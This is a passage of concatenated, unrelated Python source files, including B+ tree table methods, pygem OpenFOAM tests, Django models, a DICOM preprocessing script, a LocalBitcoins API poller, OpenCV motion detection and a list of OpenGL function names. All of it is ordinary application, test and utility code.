                if pkey in pktemp:
                    # two existing records would share the same PK
                    return 1
                pktemp.append(pkey)
        except IndexError:
            return 5
        # re-key every record: delete under the old auto key, insert under the new PK
        for c in listado:
            self.delete([c.clave])
            self.insert(c.data)
        return 0

    def alterDropPK(self):
        """Remove the PK definition: 0 ok, 4 none defined, 1 error."""
        try:
            if len(self.pk) == 0:
                return 4
            self.pk = []
            return 0
        except TypeError:
            return 1

    def alterAddColumn(self, default):
        """Append a column holding *default* to every record; bumps the
        column count on success and returns the tree's result code."""
        result = self.tabla.AlterCol("Add", default)
        if result == 0:
            self.tamCol += 1
        return result

    def alterDropColumn(self, col):
        """Drop column *col* from every record.
        Tree result on success, 4 invalid/PK/last column, 5 out of range."""
        try:
            col = int(col)
            if self.tamCol - 1 <= 0:
                # refuse to drop the only remaining column
                return 4
            if col > self.tamCol:
                return 5
            if self.pk and col in self.pk:
                # cannot drop a primary-key column
                return 4
            result = self.tabla.AlterCol("Drop", col)
            self.tamCol -= 1
            return result
        except ValueError:
            # *col* was not convertible to int
            return 4

    def graficar(self):
        """Render the underlying B+ tree via graphviz."""
        self.tabla.graphviz()
|
from unittest import TestCase
import unittest
import pygem.openfhandler as ofh
import numpy as np
import filecmp
import os
class TestOpenFoamHandler(TestCase):
    """Regression tests for pygem's OpenFoamHandler parse/write round trip."""

    # Shared fixture paths (byte-identical to the literals used before).
    mesh_file = 'tests/test_datasets/test_openFOAM'
    out_file = 'tests/test_datasets/test_openFOAM_out'

    def _handler(self):
        # Fresh handler per call, matching the old per-test instantiation.
        return ofh.OpenFoamHandler()

    def _parsed(self):
        # Parse the reference mesh and return (handler, points).
        handler = ofh.OpenFoamHandler()
        return handler, handler.parse(self.mesh_file)

    def test_open_foam_instantiation(self):
        ofh.OpenFoamHandler()

    def test_open_foam_default_infile_member(self):
        self.assertIsNone(self._handler().infile)

    def test_open_foam_default_outfile_member(self):
        self.assertIsNone(self._handler().outfile)

    def test_open_foam_default_extension_member(self):
        self.assertListEqual(self._handler().extensions, [''])

    def test_open_foam_parse_failing_filename_type(self):
        with self.assertRaises(TypeError):
            self._handler().parse(.2)

    def test_open_foam_parse_failing_check_extension(self):
        with self.assertRaises(ValueError):
            self._handler().parse('tests/test_datasets/test_square.iges')

    def test_open_foam_parse_infile(self):
        handler, _ = self._parsed()
        self.assertEqual(handler.infile, self.mesh_file)

    def test_open_foam_parse_shape(self):
        _, points = self._parsed()
        self.assertTupleEqual(points.shape, (21812, 3))

    def test_open_foam_parse_coords_1(self):
        _, points = self._parsed()
        np.testing.assert_almost_equal(points[33][0], 1.42254)

    def test_open_foam_parse_coords_2(self):
        _, points = self._parsed()
        np.testing.assert_almost_equal(points[1708][1], -3.13059)

    def test_open_foam_parse_coords_3(self):
        _, points = self._parsed()
        np.testing.assert_almost_equal(points[3527][2], .0)

    def test_open_foam_parse_coords_4(self):
        _, points = self._parsed()
        np.testing.assert_almost_equal(points[0][0], -17.5492)

    def test_open_foam_parse_coords_5(self):
        _, points = self._parsed()
        np.testing.assert_almost_equal(points[-1][2], 0.05)

    def test_open_foam_write_failing_filename_type(self):
        handler, points = self._parsed()
        with self.assertRaises(TypeError):
            handler.write(points, -1.)

    def test_open_foam_write_failing_check_extension(self):
        handler, points = self._parsed()
        with self.assertRaises(ValueError):
            handler.write(points, 'tests/test_datasets/test_square.iges')

    def test_open_foam_write_failing_infile_instantiation(self):
        # Writing without a prior parse() must fail: no infile to copy from.
        handler = self._handler()
        points = np.zeros((40, 3))
        with self.assertRaises(RuntimeError):
            handler.write(points, 'tests/test_datasets/test_openFOAM_out')

    def test_open_foam_write_outfile(self):
        handler, points = self._parsed()
        outfilename = 'tests/test_datasets/test_openFOAM_out'
        handler.write(points, outfilename)
        self.assertEqual(handler.outfile, outfilename)
        self.addCleanup(os.remove, outfilename)

    def test_open_foam_write_comparison(self):
        handler, points = self._parsed()
        # Perturb a few points at the start, middle and end of the mesh.
        points[0] = [-14., 1.55, 0.2]
        points[1] = [-14.3, 2.55, 0.3]
        points[2] = [-14.3, 2.55, 0.3]
        points[2000] = [7.8, -42.8, .0]
        points[2001] = [8.8, -41.8, .1]
        points[2002] = [9.8, -40.8, .0]
        points[-3] = [236.3, 183.7, 0.06]
        points[-2] = [237.3, 183.7, 0.06]
        points[-1] = [236.3, 185.7, 0.06]
        outfilename = 'tests/test_datasets/test_openFOAM_out'
        outfilename_expected = 'tests/test_datasets/test_openFOAM_out_true'
        handler.write(points, outfilename)
        self.assertTrue(filecmp.cmp(outfilename, outfilename_expected))
        self.addCleanup(os.remove, outfilename)
|
# __________________________________________________________________________________________________
# sample 192 ms submission
class Solution:
    def findCircleNum(self, M: List[List[int]]) -> int:
        """Count connected components ('friend circles') in adjacency matrix M."""
        visited = set()

        def explore(start: int):
            # Iterative depth-first search over the row adjacency of `start`.
            stack = [start]
            while stack:
                node = stack.pop()
                for neighbor, connected in enumerate(M[node]):
                    if connected and neighbor not in visited:
                        visited.add(neighbor)
                        stack.append(neighbor)

        circles = 0
        for row in range(len(M)):
            if row not in visited:
                explore(row)
                circles += 1
        return circles
# __________________________________________________________________________________________________
# sample 13172 kb submission
class Solution:
    def findCircleNum(self, M: List[List[int]]) -> int:
        """Count friend circles by flood-filling M in place.

        Each discovered component is overwritten with a fresh marker value
        (starting at 2), so any cell still equal to 1 belongs to a not-yet
        visited component. NOTE: mutates the input matrix M."""
        def dfs1(r, c, circle):
            # Breadth-first collection: gather every index reachable from the
            # seed pair (r, c) through cells equal to 1, then stamp the whole
            # component with the marker value `circle`.
            frds = [r, c]
            f_s = {r, c}
            i = 0
            while i < len(frds):
                j = frds[i]
                for k in range(len(M)):
                    if M[j][k] == 1 and k not in f_s:
                        f_s.add(k)
                        frds.append(k)
                i = i + 1
            # stamp every pair inside the component so no 1-cells remain
            for i in f_s:
                for j in f_s:
                    M[i][j] = circle
        circle = 1
        for i in range(len(M)):
            for j in range(len(M[0])):
                if M[i][j] == 1:
                    # unvisited component found: allocate the next marker
                    circle = circle + 1
                    dfs1(i, j, circle)
                    break
        return circle - 1
# __________________________________________________________________________________________________
|
default_app_config = 'tenant_resource.apps.TenantResourceConfig'
|
# SPDX-FileCopyrightText: 2022 Espressif Systems (Shanghai) CO LTD
# SPDX-License-Identifier: Apache-2.0
import logging
import pytest
from _pytest.fixtures import FixtureRequest
from _pytest.monkeypatch import MonkeyPatch
from pytest_embedded_idf.serial import IdfSerial
# This is a custom Serial Class to add the erase_flash functionality
class FlashEncSerial(IdfSerial):
    """IdfSerial extended with the ability to erase a single named partition."""

    @IdfSerial.use_esptool
    def erase_partition(self, partition_name: str) -> None:
        """Erase *partition_name* using the offset/size recorded in the app's
        partition table; logs an error and returns early on any bad input."""
        if partition_name is None:
            logging.error('Invalid arguments')
            return
        if not self.app.partition_table:
            logging.error('Partition table not parsed.')
            return
        if partition_name not in self.app.partition_table:
            logging.error('partition name {0} not found in app partition table'.format(partition_name))
            return
        entry = self.app.partition_table[partition_name]
        offset = entry['offset']
        size = entry['size']
        logging.info('Erasing the partition {0} of size {1} at {2}'.format(partition_name, size, offset))
        self.stub.erase_region(offset, size)
@pytest.fixture(scope='module')
def monkeypatch_module(request: FixtureRequest) -> MonkeyPatch:
    """Module-scoped MonkeyPatch (the builtin fixture is function-scoped);
    undone automatically when the module's tests finish."""
    patcher = MonkeyPatch()
    request.addfinalizer(patcher.undo)
    return patcher
@pytest.fixture(scope='module', autouse=True)
def replace_dut_class(monkeypatch_module: MonkeyPatch) -> None:
    """Swap the embedded-IDF serial class for FlashEncSerial in every test of this module."""
    monkeypatch_module.setattr('pytest_embedded_idf.serial.IdfSerial', FlashEncSerial)
|
import uuid
from django.db import models
from django.utils.text import Truncator
from django.contrib.auth.models import PermissionsMixin, AbstractBaseUser, BaseUserManager
from django.conf import settings
UPLOAD_DIRECTORY_PROFILEPHOTO = 'images_profilephoto'
class CustomUserManager(BaseUserManager):
    """
    Custom user manager to handle all the operations for the Custom User model
    """
    def create_user(self, user_id, mobile_number, email, password, **extra_fields):
        """Create and persist a regular user; *extra_fields* map to model fields.

        Bug fix: extra_fields must be expanded with ** (keyword arguments);
        the previous `*extra_fields` passed only the dict's KEYS positionally.
        """
        user = self.model(user_id=user_id, mobile_number=mobile_number, email=email, **extra_fields)
        user.set_password(password)
        user.save(using=self._db)
        return user

    def create_superuser(self, user_id, mobile_number, email, password, **extra_fields):
        """Create a user and grant the admin/superuser flags."""
        user = self.create_user(user_id, mobile_number, email, password, **extra_fields)
        user.is_admin = True
        user.is_superuser = True
        user.save(using=self._db)
        return user

    def get_by_natural_key(self, username):
        """Look up a user by the USERNAME_FIELD (user_id)."""
        return self.get(user_id=username)
class User(AbstractBaseUser, PermissionsMixin):
    """
    User that is capable of using the Information System
    """
    # Choices for the `gender` field; stored value and display label are identical.
    GENDER = [
        ('MALE', "MALE"),
        ('FEMALE', "FEMALE"),
        ('TRANSGENDER', "TRANSGENDER"),
        ('PREFER_NOT_TO_SAY', "PREFER_NOT_TO_SAY")
    ]
    user_id = models.CharField(max_length=24, null=True, blank=True, unique=True, help_text="User's unique user id, keep it irrelated with respect to your name or email.")
    full_name = models.CharField(max_length=255, null=True, blank=True, help_text="User's full name")
    gender = models.CharField(max_length=255, choices=GENDER, null=True, blank=True, help_text="User's Gender")
    email = models.EmailField(max_length=255, blank=True, null=True, default='', help_text="User's Email")
    mobile_number = models.CharField(max_length=10, blank=True, null=True, help_text="User's Mobile number")
    profile_photo = models.ImageField(max_length=255, blank=True, null=True, upload_to=UPLOAD_DIRECTORY_PROFILEPHOTO, help_text="User's Profile photo")
    pincode = models.CharField(max_length=6, help_text="User's Residential pincode")
    is_admin = models.BooleanField(default=False)  # also drives the is_staff property below
    objects = CustomUserManager()
    # Authentication configuration: log in with user_id; mobile_number and
    # email are prompted for by `createsuperuser`.
    USERNAME_FIELD = 'user_id'
    REQUIRED_FIELDS = ['mobile_number', 'email',]
    # NOTE(review): Django expects `unique_together` inside a `class Meta`;
    # this uppercase class attribute is ignored by the ORM — confirm intent.
    UNIQUE_TOGETHER = ['user_id', 'email']
    def __str__(self):
        # `self.id` is the implicit auto primary key Django adds to the model.
        return '%s - %s'%(self.id, self.full_name)
    @property
    def is_staff(self):
        "Is the user a member of staff?"
        # Simplest possible answer: All admins are staff
        return self.is_admin
# Python script to pre-process Duke data:
# o reorganizes the directory structire into LabCAS archive format
# o creates the dataset metadata file
import os
import sys
from glob import glob
from shutil import copyfile
import dicom
# process data from $LABCAS_ARCHIVE/Duke --> $LABCAS_ARCHIVE/Sample_Mammography_Reference_Set
COLLECTION_NAME = "Sample_Mammography_Reference_Set"
# Destination archive root (LabCAS layout), raw Duke source dump, and the
# directory holding the dataset metadata template (from env vars).
TARGET_DATA_DIR=os.environ['LABCAS_ARCHIVE'] + "/" + COLLECTION_NAME
SRC_DATA_DIR=os.environ['LABCAS_ARCHIVE'] + "/Duke"
METADATA_DIR=os.environ['LABCAS_METADATA'] + "/" + COLLECTION_NAME
INSTITUTION = "Duke"
def main():
    """Convert every immediate child of the Duke source dump."""
    for source_subdir in glob(SRC_DATA_DIR + "/*"):
        # Only the directory's base name identifies the dataset.
        _, dataset_name = os.path.split(source_subdir)
        process_dataset(dataset_name)
def process_dataset( dataset_id):
    """Convert one Duke subject directory into a LabCAS dataset.

    Creates the versioned target directory, writes a dataset metadata
    .cfg file from the template (once), then copies every DICOM file
    found under the source tree into version 1 of the dataset.
    Python 2 script: uses print statements and the legacy `dicom` module.
    """
    # dataset directory
    #dataset_id = sys.argv[1]
    #dataset_id = 'D0001'
    src_dataset_dir = '%s/%s' % (SRC_DATA_DIR, dataset_id)
    target_dataset_dir = '%s/%s' % (TARGET_DATA_DIR, dataset_id)
    # dataset version directory
    target_version_dir = '%s/1' % target_dataset_dir
    if not os.path.exists(target_version_dir):
        os.makedirs(target_version_dir)
    # create dataset metadata file
    template_file = METADATA_DIR + "/TEMPLATE_Duke.cfg"
    dataset_archive_dir = TARGET_DATA_DIR + "/" + dataset_id
    if not os.path.exists(dataset_archive_dir):
        os.makedirs(dataset_archive_dir)
    dataset_metadata_file = dataset_archive_dir + "/" + dataset_id + ".cfg"
    # Write the metadata file only once; never clobber an existing one.
    if not os.path.exists(dataset_metadata_file):
        print 'Creating dataset metadata file: %s' % dataset_metadata_file
        # read in template metadata file
        with open(template_file) as f:
            metadata = f.read()
        # replace metadata
        metadata = metadata.replace("DATASET_ID", dataset_id)
        # 'D'-prefixed ids denote dummy patients; anything else is real.
        if dataset_id[0]=='D':
            dataset_name = 'Dummy patient #%s (%s)' % (dataset_id[1:], INSTITUTION)
        else:
            dataset_name = 'Real patient #%s (%s)' % (dataset_id[1:], INSTITUTION)
        dataset_description = dataset_name + " mammography images"
        metadata = metadata.replace("DATASET_NAME", dataset_name)
        metadata = metadata.replace("DATASET_DESCRIPTION", dataset_description)
        # write out metadata
        with open(dataset_metadata_file, 'w') as f:
            f.write(metadata)
    # loop over DICOM files in dataset directory tree
    print src_dataset_dir
    for root, dirs, files in os.walk(src_dataset_dir):
        print dirs
        for filename in files:
            f = "%s/%s" % (root, filename)
            # extract file metadata
            src_path = os.path.abspath(f)
            try:
                ds = dicom.read_file(f)
                tag_names = ds.dir()
                # Dump every non-pixel DICOM tag that has a value.
                for tag_name in tag_names:
                    data_element = ds.data_element(tag_name)
                    if tag_name != 'PixelData' and data_element and data_element.value:
                        print 'key=%s --> value=%s' % (tag_name, data_element.value)
                fid = ds.SOPInstanceUID
                # move and rename DICOM file
                # use DICOM identifier
                #dst_path = '%s/%s.dcm' % (target_version_dir, fid)
                # use original filename, do NOT add dcm extension which is already included
                dst_path = '%s/%s' % (target_version_dir, filename)
                if not os.path.exists(dst_path):
                    print '\nCopying DICOM file=%s --> %s' % (src_path, dst_path)
                    copyfile(src_path, dst_path)
            except Exception as e:
                # Best-effort conversion: log the failure, continue with
                # the next file rather than aborting the whole dataset.
                print 'Error while processing file: %s' % src_path
                print e
# Script entry point: process every subject directory in the source dump.
if __name__ == "__main__":
    main()
|
""" Tests for vol_rms_diff function in diagnostics module
Run with:
nosetests test_vol_rms_diff.py
"""
import numpy as np
from .. import diagnostics
from numpy.testing import assert_almost_equal, assert_array_equal
def test_vol_rms_diff():
    """Check vol_rms_diff against an independently computed RMS."""
    # Build a fake 4D image from a flat (voxels, time) array, so the
    # expected answer can be computed directly on the 2D data.
    vol_shape = (2, 3, 4)
    n_voxels = np.prod(vol_shape)
    n_trs = 10  # number of 3D volumes
    data_2d = np.random.normal(size=(n_voxels, n_trs))
    # RMS of the volume-to-volume differences, done by hand.
    diffs = np.diff(data_2d, axis=1)
    expected_rms = np.sqrt(np.mean(diffs ** 2, axis=0))
    # Reshape to 4D and compare against the function under test.
    data_4d = np.reshape(data_2d, vol_shape + (n_trs,))
    assert_almost_equal(diagnostics.vol_rms_diff(data_4d), expected_rms)
|
# Copyright (c) 2005-2007 ActiveState Software Ltd.
"""Configuration support for Makefile.py's."""
import sys
import os
from os.path import isfile, basename, splitext, join, dirname, normpath, \
exists, abspath
from pprint import pprint
import imp
import types
from mklib.common import *
class ConfigurationType(type):
    """Metaclass that auto-registers Configuration subclasses.

    Any Configuration subclass defined in a Makefile.py is registered on
    that Makefile by inspecting the defining module's globals via the
    caller's stack frame.
    """
    def __init__(cls, name, bases, dct):
        super(ConfigurationType, cls).__init__(name, bases, dct)
        # Skip the base classes defined in this module itself; only user
        # subclasses (defined elsewhere) get registered.
        if dct["__module__"] != "mklib.configuration":
            # Register this on the Makefile.
            # The class statement executes in the Makefile.py module, so
            # frame 1's globals carry the `_mk_makefile_` marker.
            frame = sys._getframe(1)
            makefile = frame.f_globals["_mk_makefile_"]
            makefile.define_configuration(cls, name, bases, dct)
            log_makefile_defn("Configuration", name, frame)
class Configuration(object):
    """A basic configuration object.

    This lightly wraps a config.py module typically created with a
    `configure.py' script (using the associate `configurelib' utility).

    Usage in a Makefile.py
    ----------------------
        from mklib import Configuration
        class cfg(Configuration):
            pass

    This will expect a `config.py' file next to `Makefile.py' that will
    be imported and provided to each Task instance as `self.cfg'. (Note
    that the Task attribute will be `self.cfg' whatever the name of the
    defined Configuration class.)

        class cfg(Configuration):
            prefix = "foo"

    This will expect a `fooconfig.py' file instead of `config.py'.
    Projects are encouraged to use a short prefix for config modules to
    avoid possible Python module name collisions.

    If there is no Configuration class definition in a `Makefile.py'
    then `self.cfg' on Tasks will be None.
    """
    __metaclass__ = ConfigurationType
    # Absolute-ish path of the backing config module (set in __init__).
    _path = None
    # Optional filename prefix: "<prefix>config.py" instead of "config.py".
    prefix = None
    dir = os.curdir # Can be set to, say, '..' to pick up config.py up on dir.
    def __init__(self, makefile, config_file_path_override=None):
        self.makefile = makefile
        if config_file_path_override:
            self._path = config_file_path_override
        else:
            prefix = self.prefix or ''
            self._path = normpath(join(makefile.dir, self.dir,
                                       prefix + "config.py"))
        self._reload()
    def __repr__(self):
        return "<Configuration '%s'>" % self._path
    def as_dict(self):
        """Return a dict of config vars.

        This skips internal symbols (those starting with '_') and
        instance methods. It will *get* all properties.
        """
        d = dict((k,v) for k,v in self._mod.__dict__.items()
                 # Skip internal symbols of the module.
                 if not k.startswith('_'))
        # Also get all properties and public attributes (but not
        # methods).
        for attrname in dir(self):
            if attrname.startswith('_'): continue
            try:
                attrtype = type(getattr(self.__class__, attrname))
            except AttributeError:
                # This must be an instance attribute.
                d[attrname] = getattr(self, attrname)
            else:
                if attrtype != types.UnboundMethodType:
                    # Skip instance methods.
                    d[attrname] = getattr(self, attrname)
        return d
    def as_simple_obj(self):
        """Return a simple StaticConfiguration instance with all config vars.

        This essentially "freezes" the set of config vars (some of which
        might normally be determined dynamically via properties). This
        can be useful to pass the configuration to a tool that needs all
        the values statically (e.g. patchtree.py).
        """
        return StaticConfiguration(**self.as_dict())
    def _reload(self):
        # (Re-)import the config module from disk.
        log.debug("reading `%s'", self._path)
        name = splitext(basename(self._path))[0]
        conf_pyc = splitext(self._path)[0] + ".pyc"
        if isfile(conf_pyc):
            # If the .py is newer than the .pyc, the .pyc sometimes (always?)
            # gets imported instead, causing problems.
            os.remove(conf_pyc)
        try:
            cfg_dir = dirname(abspath(self._path))
            file, path, desc = imp.find_module(name, [cfg_dir])
            # Import with the config's own directory as cwd so relative
            # paths inside config.py resolve; always restore afterwards.
            curr_dir = os.getcwd()
            if curr_dir != cfg_dir:
                os.chdir(cfg_dir)
            try:
                self._mod = imp.load_module(name, file, path, desc)
            finally:
                if curr_dir != cfg_dir:
                    os.chdir(curr_dir)
        except ImportError, ex:
            if not exists(self._path):
                details = "`%s' does not exist" % self._path
                if exists(join(dirname(self._path), "configure.py")):
                    details += " (perhaps you need to run './configure.py' first)"
            else:
                details = str(ex)
            raise MkError("could not import config file '%s': %s"
                          % (self._path, details))
    def __getattr__(self, name):
        # Delegate unknown attribute access to the wrapped config module.
        if not hasattr(self._mod, name):
            raise AttributeError("configuration has no attribute '%s'" % name)
        return getattr(self._mod, name)
class StaticConfiguration(object):
    """A static "frozen" configuration.

    From Configuration.as_simple_obj().
    """
    def __init__(self, **kwargs):
        # Install every config var directly as an instance attribute.
        self.__dict__.update(kwargs)
|
import json
import sys
import os
import time
from lbcapi import api
# Apiauth-Nonce
# A nonce is an integer number, that needs to increase with every API request.
def getNonce():
    """Milliseconds since the epoch, as a string.

    Serves as the Apiauth-Nonce header value, which must increase with
    every API request.
    """
    millis = round(time.time() * 1000)
    return str(millis)
# /bitcoinaverage/ticker-all-currencies/
def getBitCoinAverage():
    # TODO: stub -- intended to query the
    # /bitcoinaverage/ticker-all-currencies/ endpoint (see comment above).
    pass
# Seller advertisements ("ofertas de los vendedores")
class Seller:
    """One seller advertisement taken from the LocalBitcoins ad list."""

    def __init__(self, data):
        self.data = data
        self.parse()

    def parse(self):
        """Lift the interesting ad fields into flat attributes."""
        profile = self.data['profile']
        self.userNm = profile['username']
        self.min = self.data['min_amount']
        self.max = self.data['max_amount']
        self.price = self.data['temp_price']

    def mostrar(self):
        """Debugging aid: dump the raw ad payload."""
        print('Data:', self.data)
        print()
# Connection to LocalBitcoins
def connect(conArgs):
    """Build an authenticated LocalBitcoins API connection from config."""
    credentials = conArgs['api']
    return api.hmac(credentials['key'], credentials['secret'])
# Fetches prices from LocalBitcoins
def requestMaker(conn, restId):
    """Dispatch one API request identified by *restId* and print results.

    Only 'p2pSellers' is implemented: it fetches the USD/PayPal
    online-buy ad list and indexes each ad by seller username.
    """
    if restId == 'p2pSellers':
        # get Sellers by currency & paymentMethod
        result = conn.call('GET', '/buy-bitcoins-online/usd/paypal/.json').json()
        # print(result)
        sellersList = result.get('data').get('ad_list')
        # print(sellersList)
        print(json.dumps(sellersList))
        if sellersList:
            # Index the ads by seller username.
            mySellers = {}
            for i in sellersList:
                # print(i['data'])
                # print()
                o = Seller(i['data'])
                # o.mostrar()
                mySellers[o.userNm] = o
                # print(o.userNm)
                # print()
            # for i in mySellers:
            # print('userName CraMin CpraMax PrecioUSD')
            # print(mySellers[i].userNm, ' ', mySellers[i].min, ' ', mySellers[i].max, ' ',
            # mySellers[i].price)
        else:
            # No ads matched the query ("no sellers for the query").
            print('NO HAY VENDERORES PARA LA QUERY')
    elif restId == 'p2pBuyers':
        # TODO: buyer-side query not implemented yet.
        pass
    else:
        pass
def startApp(conArgs):
    """Poll the p2p sellers endpoint once a minute, forever."""
    connection = connect(conArgs)
    while True:
        requestMaker(connection, 'p2pSellers')
        time.sleep(60)
def main(argv):
    """Load JSON settings from ../localBitCoinApi.ini and start polling."""
    settings_path = os.path.abspath(
        os.path.join(os.path.dirname(__file__), '..', 'localBitCoinApi.ini'))
    with open(settings_path, 'r') as handle:
        settings = json.load(handle)
    startApp(settings)
def init():
    # Entry-point guard wrapped in a function; does nothing when this
    # module is imported rather than executed as a script.
    if __name__ == '__main__':
        sys.exit(main(sys.argv))
init()
|
import cv2
import numpy as np
# Live motion detection: grab frames from the default camera and show the
# thresholded difference between consecutive grayscale frames.
cap = cv2.VideoCapture(0)
# Check if camera opened successfully
if (cap.isOpened()== False):
    print("Error opening video stream or file")
frameNum = 0
# Read until video is completed
while(cap.isOpened()):
    # Capture frame-by-frame
    ret, frame = cap.read()
    frameNum += 1
    if ret == True:
        tempframe = frame
        # The very first frame only seeds the reference image.
        if(frameNum==1):
            previousframe = cv2.cvtColor(tempframe, cv2.COLOR_BGR2GRAY)
            print(111)
        if(frameNum>=2):
            # Motion mask: absolute difference against the previous frame,
            # then median-smoothed and binarized.
            currentframe = cv2.cvtColor(tempframe, cv2.COLOR_BGR2GRAY)
            currentframe = cv2.absdiff(currentframe,previousframe)
            median = cv2.medianBlur(currentframe,3)
            # img = cv2.imread("E:/chinese_ocr-master/4.png")
            # img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
            ret, threshold_frame = cv2.threshold(currentframe, 20, 255, cv2.THRESH_BINARY)
            gauss_image = cv2.GaussianBlur(threshold_frame, (3, 3), 0)
            print(222)
            # Display the resulting frame ('原图' window shows the raw feed)
            cv2.imshow('原图',frame)
            cv2.imshow('Frame',currentframe)
            cv2.imshow('median',median)
            # Press Q on keyboard to exit
            if cv2.waitKey(33) & 0xFF == ord('q'):
                break
        # Refresh the reference frame for the next iteration.
        previousframe = cv2.cvtColor(tempframe, cv2.COLOR_BGR2GRAY)
    # Break the loop
    else:
        break
# When everything done, release the video capture object
cap.release()
# Closes all the frames
cv2.destroyAllWindows()
|
from django.db import models
from manage_tools.models import Tool
from user.models import User
class Request(models.Model):
    """A borrow request for a tool, tracked from submission to return."""
    # Two-letter status codes persisted in `status`.
    PENDING_APPROVAL = 'PA'
    APPROVED = 'AP'
    REJECTED = 'RE'
    RETURNED = 'RT'
    status_choices = (
        (PENDING_APPROVAL, 'Pending Approval'),
        (APPROVED, 'Approved'),
        (REJECTED, 'Rejected'),
        (RETURNED, 'Returned')
    )
    # NOTE(review): ForeignKey without on_delete is pre-Django-2.0 style
    # (implicit CASCADE); the keyword is required on Django >= 2.0.
    tool = models.ForeignKey(Tool, related_name='requests')
    lender = models.ForeignKey(User, related_name='lender_requests')
    borrower = models.ForeignKey(User, related_name='borrower_requests')
    status = models.CharField(choices=status_choices, max_length=2, default="PA")
    comment = models.CharField(max_length=150, default="")
    # `date` is set once at creation; `updated` refreshes on every save.
    date = models.DateTimeField(auto_now_add=True, auto_now=False)
    returned_date = models.DateTimeField(null=True)
    shared_from = models.CharField(choices=Tool.shared_choices, max_length=2)
    zipcode = models.CharField(max_length=5)
    updated = models.DateTimeField(auto_now_add=False, auto_now=True)
    borrower_enabled = models.BooleanField(default=True)
    lender_enabled = models.BooleanField(default=True)
    may_leave_comment = models.BooleanField(default=False)
    def __str__(self):
        return self.status + " - " + str(self.tool.id) + " - " + str(self.lender.id) + " - " + str(self.borrower.id)
    def get_status_choices(self):
        # Human-readable label for the current status code.
        return dict(self.status_choices).get(self.status)
class Notification(models.Model):
    """Per-user counters of pending sent/received requests."""
    user = models.OneToOneField(User)
    pending_sent = models.PositiveSmallIntegerField(default=0)
    pending_received = models.PositiveSmallIntegerField(default=0)
    timestamp = models.DateTimeField(auto_now_add=True, auto_now=False)
    updated = models.DateTimeField(auto_now_add=False, auto_now=True)
    def __str__(self):
        return self.user.last_name + ", " + self.user.first_name
    # NOTE(review): neither increment persists the change -- callers must
    # invoke save() themselves; confirm that is intentional.
    def increment_sent(self):
        self.pending_sent += 1
    def increment_received(self):
        self.pending_received += 1
|
from flourish.generators.atom import AtomGenerator
# Flourish URL routing: publish a single Atom feed at /index.atom.
PATHS = [
    AtomGenerator(
        path = '/index.atom',
        name = 'atom-feed',
    ),
]
|
##########################################################################
#### This module plots a specific, hard-coded data set (not parameterized)
##########################################################################
# import libraries
import numpy as np
import pandas as pd
import os
from utils.plot_data import PlotData
save_plt_learning = './detection_error_compare.eps'
def main():
    """Plot steganalysis detection error vs. payload for three algorithms."""
    plotter = PlotData()
    # One entry per curve (S-UNIWARD, WOW, HUGO); extra linestyle unused.
    line_styles = ['-', '-', '-.', ':']
    line_colors = ['b', 'r', 'g']
    point_markers = ['^', 'D', 'o']
    labels = ['S-UNIWARD', 'WOW', 'HUGO']
    payloads = [1, 0.7, 0.5, 0.3]
    detection_errors = [
        [0.04, 0.07, 0.12, 0.27],
        [0.04, 0.08, 0.17, 0.33],
        [0.04, 0.09, 0.16, 0.31],
    ]
    plotter.plot_detection_error(
        payloads, detection_errors, line_colors, line_styles,
        point_markers, labels, save_plt_learning)
if __name__ == "__main__":
    main()
|
hens, goats = map(int, input().split())
print(2 * hens + 4 * goats, 2 * (hens + goats))
|
glfuncnames = """
GlmfBeginGlsBlock
GlmfCloseMetaFile
GlmfEndGlsBlock
GlmfEndPlayback
GlmfInitPlayback
GlmfPlayGlsRecord
glAccum
glAlphaFunc
glAreTexturesResident
glArrayElement
glBegin
glBindTexture
glBitmap
glBlendFunc
glCallList
glCallLists
glClear
glClearAccum
glClearColor
glClearDepth
glClearIndex
glClearStencil
glClipPlane
glColor3b
glColor3bv
glColor3d
glColor3dv
glColor3f
glColor3fv
glColor3i
glColor3iv
glColor3s
glColor3sv
glColor3ub
glColor3ubv
glColor3ui
glColor3uiv
glColor3us
glColor3usv
glColor4b
glColor4bv
glColor4d
glColor4dv
glColor4f
glColor4fv
glColor4i
glColor4iv
glColor4s
glColor4sv
glColor4ub
glColor4ubv
glColor4ui
glColor4uiv
glColor4us
glColor4usv
glColorMask
glColorMaterial
glColorPointer
glCopyPixels
glCopyTexImage1D
glCopyTexImage2D
glCopyTexSubImage1D
glCopyTexSubImage2D
glCullFace
glDebugEntry
glDeleteLists
glDeleteTextures
glDepthFunc
glDepthMask
glDepthRange
glDisable
glDisableClientState
glDrawArrays
glDrawBuffer
glDrawElements
glDrawPixels
glEdgeFlag
glEdgeFlagPointer
glEdgeFlagv
glEnable
glEnableClientState
glEnd
glEndList
glEvalCoord1d
glEvalCoord1dv
glEvalCoord1f
glEvalCoord1fv
glEvalCoord2d
glEvalCoord2dv
glEvalCoord2f
glEvalCoord2fv
glEvalMesh1
glEvalMesh2
glEvalPoint1
glEvalPoint2
glFeedbackBuffer
glFinish
glFlush
glFogf
glFogfv
glFogi
glFogiv
glFrontFace
glFrustum
glGenLists
glGenTextures
glGetBooleanv
glGetClipPlane
glGetDoublev
glGetError
glGetFloatv
glGetIntegerv
glGetLightfv
glGetLightiv
glGetMapdv
glGetMapfv
glGetMapiv
glGetMaterialfv
glGetMaterialiv
glGetPixelMapfv
glGetPixelMapuiv
glGetPixelMapusv
glGetPointerv
glGetPolygonStipple
glGetString
glGetTexEnvfv
glGetTexEnviv
glGetTexGendv
glGetTexGenfv
glGetTexGeniv
glGetTexImage
glGetTexLevelParameterfv
glGetTexLevelParameteriv
glGetTexParameterfv
glGetTexParameteriv
glHint
glIndexMask
glIndexPointer
glIndexd
glIndexdv
glIndexf
glIndexfv
glIndexi
glIndexiv
glIndexs
glIndexsv
glIndexub
glIndexubv
glInitNames
glInterleavedArrays
glIsEnabled
glIsList
glIsTexture
glLightModelf
glLightModelfv
glLightModeli
glLightModeliv
glLightf
glLightfv
glLighti
glLightiv
glLineStipple
glLineWidth
glListBase
glLoadIdentity
glLoadMatrixd
glLoadMatrixf
glLoadName
glLogicOp
glMap1d
glMap1f
glMap2d
glMap2f
glMapGrid1d
glMapGrid1f
glMapGrid2d
glMapGrid2f
glMaterialf
glMaterialfv
glMateriali
glMaterialiv
glMatrixMode
glMultMatrixd
glMultMatrixf
glNewList
glNormal3b
glNormal3bv
glNormal3d
glNormal3dv
glNormal3f
glNormal3fv
glNormal3i
glNormal3iv
glNormal3s
glNormal3sv
glNormalPointer
glOrtho
glPassThrough
glPixelMapfv
glPixelMapuiv
glPixelMapusv
